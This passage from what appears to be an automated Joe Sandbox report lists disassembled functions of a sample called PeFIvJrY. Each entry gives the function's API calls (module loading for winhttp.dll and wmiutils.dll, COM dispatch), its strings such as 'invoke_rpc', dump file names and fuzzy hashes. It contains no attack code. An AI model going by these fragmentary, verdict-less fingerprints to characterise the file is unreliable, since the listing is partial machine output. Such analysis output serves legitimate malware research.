                                • GetModuleHandleW.KERNEL32(wmiutils.dll,A05DD77D), ref: 003FC248
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID: unknown$wmiutils.dll
                                • API String ID: 4139908857-194848584
                                • Opcode ID: 9fd84001eb959a555a4a01d1a70883d0bfe1cf1d6e0d25a3f2888604db6d02f6
                                • Instruction ID: 3e90d5a92592e9965b14222fba657234996eec1bc4fece0c7542d38596122e42
                                • Opcode Fuzzy Hash: 9fd84001eb959a555a4a01d1a70883d0bfe1cf1d6e0d25a3f2888604db6d02f6
                                • Instruction Fuzzy Hash: 0B512670A5020C9BDB15CF69DD41BBEBBB4FB49710F10422EE911AB382DB75A904CB91
                                Function 00404460 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Unicode
                                • String ID: `F
                                • API String ID: 470584828-510860190
                                • Opcode ID: e2d81c3b824c5f4f11962fb559425883ee5ba1f91ef5b899ec28e374eb6796d8
                                • Instruction ID: 93048e7c8c6e9720ea2b7cd057e1257b7fb0b31586fac0a873fd3533b663f3c2
                                • Opcode Fuzzy Hash: e2d81c3b824c5f4f11962fb559425883ee5ba1f91ef5b899ec28e374eb6796d8
                                • Instruction Fuzzy Hash: A3413DB1900209AFDB10DFA9C845BAEFBF8FF48314F14812AD915AB380D774A944CBA5
                                Function 004282BE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • RtlEncodePointer.NTDLL(00000000), ref: 004282E3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: EncodePointer
                                • String ID: MOC$RCC
                                • API String ID: 2118026453-2084237596
                                • Opcode ID: bb4effc26c59d1e4558318f5f02c71e6ee0beec1415469d16b172e902c4d176e
                                • Instruction ID: bc104558e052ee42d2c17a29909e945637320f454f8c54a17b30395cc0f2571f
                                • Opcode Fuzzy Hash: bb4effc26c59d1e4558318f5f02c71e6ee0beec1415469d16b172e902c4d176e
                                • Instruction Fuzzy Hash: CE419C31A00219EFCF15DF98ED81AEE7BB1FF08304F54805AF904A6211D73A9950CB58
                                Function 003EE480 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VariantClear.OLEAUT32(?), ref: 003EE56A
                                • SysAllocStringLen.OLEAUT32(external client,0000000F), ref: 003EE57F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AllocClearStringVariant
                                • String ID: external client
                                • API String ID: 1959693985-2850503550
                                • Opcode ID: d75ca75c1246373241b859e1eaf7b662b4a9f1ae635444481540761ab7ec061f
                                • Instruction ID: 8fd8bee01f207a0b6a5971d80cccb1e2c1eb85f3ce3cdb8a3cc02a99ce51961b
                                • Opcode Fuzzy Hash: d75ca75c1246373241b859e1eaf7b662b4a9f1ae635444481540761ab7ec061f
                                • Instruction Fuzzy Hash: F93102799006A9DBCB12DF96DC01BBAB774FB15304F104A2AED19A72D0EB35E910CB94
                                Function 00418440 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON
                                Download Yara Rule
                                APIs
                                • Concurrency::cancel_current_task.LIBCPMT ref: 00418539
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Concurrency::cancel_current_task
                                • String ID: gfff$gfff
                                • API String ID: 118556049-3084402119
                                • Opcode ID: db5fa17803c80e63141cca86b57056796041d00cb59d0c8b520df2b5a5235220
                                • Instruction ID: 3addcfd2374d3f6cfe2a1d3a9e7e647a9a4a307aca78603f7460f655d894d07b
                                • Opcode Fuzzy Hash: db5fa17803c80e63141cca86b57056796041d00cb59d0c8b520df2b5a5235220
                                • Instruction Fuzzy Hash: 65310AB26000149BDB18DF1AED819AAB75ADFC5340758826EEC06CF345EA35FD50C7A6
                                Function 003E9A4D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON
                                Download Yara Rule
                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003E9B79
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: framework$invoke_rpc
                                • API String ID: 885266447-3532104870
                                • Opcode ID: 54ce5b09c39ff25d86b8c814f5bf6a9f77caef222ac7a9d433c54767e6cc7f57
                                • Instruction ID: b35bb9dd27fffbe073665504c6fca999603a184b8d77957ff41ca99c440bf014
                                • Opcode Fuzzy Hash: 54ce5b09c39ff25d86b8c814f5bf6a9f77caef222ac7a9d433c54767e6cc7f57
                                • Instruction Fuzzy Hash: 2C116D61E003542AEB21EA76DC06FAB37ACDF40310F1405AAF948971D2EA74AE44C3E5
                                Function 003F4490 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                Download Yara Rule
                                APIs
                                • CreateDispTypeInfo.OLEAUT32(00000000,00000800,00000000), ref: 003F44E4
                                • CreateStdDispatch.OLEAUT32(00000000,00000000,00000000,00000008), ref: 003F4534
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Create$DispDispatchInfoType
                                • String ID: `F?
                                • API String ID: 386578787-2815678348
                                • Opcode ID: 6b0a18d15e46d528f2192db40d8b28448cc5108b0377fd0d4e7b74200097e143
                                • Instruction ID: 5899e48055df7258b6a0cfdeb22ccb99b2be97fbaea085773f851256ecaab283
                                • Opcode Fuzzy Hash: 6b0a18d15e46d528f2192db40d8b28448cc5108b0377fd0d4e7b74200097e143
                                • Instruction Fuzzy Hash: DD21E271500709DFD711EF94C809BABBBF8EF45720F204169EA1A9B380DB74A904CB95
                                Function 004243F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __alloca_probe_16.LIBCMT ref: 0042447C
                                • RaiseException.KERNEL32(?,?,?,?,00000001), ref: 004244A1
                                  • Part of subcall function 00427210: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00460EFC,00000017,0042372F,?,004589A4,?), ref: 00427270
                                  • Part of subcall function 0042E422: IsProcessorFeaturePresent.KERNEL32(00000017,0042FFD0), ref: 0042E43E
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                • String ID: csm
                                • API String ID: 1924019822-1018135373
                                • Opcode ID: 569424fd3eafc119c8939de28ac22d5fa2fbdc26f3a87d1d7cfe1b2109301a83
                                • Instruction ID: 7655cc3ead4a655d69129440c74f56814c3540cb4fafef13c2e8c8ba68210561
                                • Opcode Fuzzy Hash: 569424fd3eafc119c8939de28ac22d5fa2fbdc26f3a87d1d7cfe1b2109301a83
                                • Instruction Fuzzy Hash: 4C21AF31E002289BCF24EF95E845BAEB3B8EF80714F95441AE405BB351DA38AD44CB98
                                Function 004015E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ___tlregdtor
                                • String ID: CORE$_TLD
                                • API String ID: 258401038-4220718512
                                • Opcode ID: 1a73039a95544f54b109ce19c30de66d8f7dc70288daf5bf6539da84ac2ad0e1
                                • Instruction ID: 67a3faa56420e98cd601a6c8b851815d487cb340b98f67c497657b9b81aeea3d
                                • Opcode Fuzzy Hash: 1a73039a95544f54b109ce19c30de66d8f7dc70288daf5bf6539da84ac2ad0e1
                                • Instruction Fuzzy Hash: AD21ACB1A04B409FE361CF29D841B93B7E8FB09710F04496EE46E87391DBB97804CB96
                                Function 0042640F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
                                Download Yara Rule
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003E20CE
                                  • Part of subcall function 00427210: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00460EFC,00000017,0042372F,?,004589A4,?), ref: 00427270
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ExceptionRaise___std_exception_copy
                                • String ID: @ >$@ >
                                • API String ID: 3109751735-3421840758
                                • Opcode ID: 9bddadf1ca33c41bf55cb5fdfb7ba4db751094876b53830b022360c08cbf6831
                                • Instruction ID: fb0cdd26371112b554e34e81bdbe0fe93535ab397a4784194c65f56cb967adab
                                • Opcode Fuzzy Hash: 9bddadf1ca33c41bf55cb5fdfb7ba4db751094876b53830b022360c08cbf6831
                                • Instruction Fuzzy Hash: 12112931A0022CB7CB14BBB5FC02989776C9E00314BA08937FB14A7182FB78EA55869D
                                Function 00425711 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00425A09
                                • ___raise_securityfailure.LIBCMT ref: 00425AF1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                • String ID: pCF
                                • API String ID: 3761405300-4015737121
                                • Opcode ID: 8c6622a5dd56ee4636118929f4a62706778da63d7aff81bae41b78bcc0ad66f2
                                • Instruction ID: 77e48fb440844a68c40b68c4872e5a1cb5d0995b7edbaa33ed3ce5318b60968c
                                • Opcode Fuzzy Hash: 8c6622a5dd56ee4636118929f4a62706778da63d7aff81bae41b78bcc0ad66f2
                                • Instruction Fuzzy Hash: EA21CFB4611204DEEB14CF65F9467407BA8BB89314F11413AE9088B3A1FBF59885CF5E
                                Function 003FC5F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(ntdll.dll,A05DD77D), ref: 003FC624
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID: ntdll.dll$unknown
                                • API String ID: 4139908857-665686941
                                • Opcode ID: f556089a122ef55d57a58c15a6626e72c1d6ee81e0fef4d39472a1cc6be404da
                                • Instruction ID: 5201d3559591e050eb923b4bdb92d6baef7d7a6ca3c341813ab87e4b5e617296
                                • Opcode Fuzzy Hash: f556089a122ef55d57a58c15a6626e72c1d6ee81e0fef4d39472a1cc6be404da
                                • Instruction Fuzzy Hash: B3112B71E5410CDBDB01DF64DC42BBFB778EB04B04F14812AE911AB781EB79A904C795
                                Function 003FBCA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(winhttp.dll,A05DD77D), ref: 003FBCD4
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID: unknown$winhttp.dll
                                • API String ID: 4139908857-1431162475
                                • Opcode ID: b332a0c159b23d6f8f90c71b5db0e309c969d211aef4c31b29da3acf485318d4
                                • Instruction ID: 9a18ccbe1448cbc336181fc0496615f2f01f01ee90a1b31c831c69a55861f01a
                                • Opcode Fuzzy Hash: b332a0c159b23d6f8f90c71b5db0e309c969d211aef4c31b29da3acf485318d4
                                • Instruction Fuzzy Hash: AB1108B1E4414CDBDB01DF64DC42BBFB778EB04B04F10812AF9116B681EB79A904C795
                                Function 003EDD10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 003FFE90: QueryUnbiasedInterruptTimePrecise.KERNELBASE ref: 003FFEFD
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003EDCD8
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: InterruptPreciseQueryTimeUnbiasedUnothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: ICommunicator::send_message$framework
                                • API String ID: 58087820-3514916642
                                • Opcode ID: d30d0b6fbd71c6956d8d1d868a7132a79fa90d816636d5ea78341d4c42e78959
                                • Instruction ID: 450e53189016732778ed02a3e493acc35696e93a6c1280d65888556e8f27bbf6
                                • Opcode Fuzzy Hash: d30d0b6fbd71c6956d8d1d868a7132a79fa90d816636d5ea78341d4c42e78959
                                • Instruction Fuzzy Hash: B8F0596264031436E224692E9C0BFB3378DCBC5B20F10066A7E48572C2D9D4AC0082E4
                                Function 003E9B50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 003FFE90: QueryUnbiasedInterruptTimePrecise.KERNELBASE ref: 003FFEFD
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003E9B79
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: InterruptPreciseQueryTimeUnbiasedUnothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: framework$invoke_rpc
                                • API String ID: 58087820-3532104870
                                • Opcode ID: 35d3e8ac11e5e5da4afa325ccd85d2b134debd955c6c9de94058398bd859a6b5
                                • Instruction ID: dc6429e73ec58920d59cc1072fb07726c261df71c11d6cf2f9daab72ba0e6056
                                • Opcode Fuzzy Hash: 35d3e8ac11e5e5da4afa325ccd85d2b134debd955c6c9de94058398bd859a6b5
